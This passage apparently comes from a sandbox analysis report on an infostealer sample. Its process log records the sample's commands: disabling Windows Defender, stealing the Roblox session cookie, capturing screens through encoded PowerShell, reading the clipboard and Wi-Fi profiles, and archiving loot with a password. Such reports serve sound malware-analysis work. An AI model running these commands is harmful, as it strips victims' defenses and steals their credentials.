| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://sharksecurity.vercel.app/shark_botnet_c2.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcf3146f8,0x7ffdcf314708,0x7ffdcf314718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\desktop.ini
C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe"
C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAAgACgARQB4AGMAZQBwAHQAaQBvAG4AKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\omjkrhd1\omjkrhd1.cmdline"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EFA.tmp" "c:\Users\Admin\AppData\Local\Temp\omjkrhd1\CSC1968C0B59996411DA551B71CF87467.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 408
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1340"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 408
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1340
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1340"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1340
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1496"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1496"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1496
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1496
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1876"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1876"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1876
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1876
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4876
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4876
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2548"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2548"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2548
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2548
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3428
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3428
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3956"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3956"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3956
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3956
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\P2YCi.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\P2YCi.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
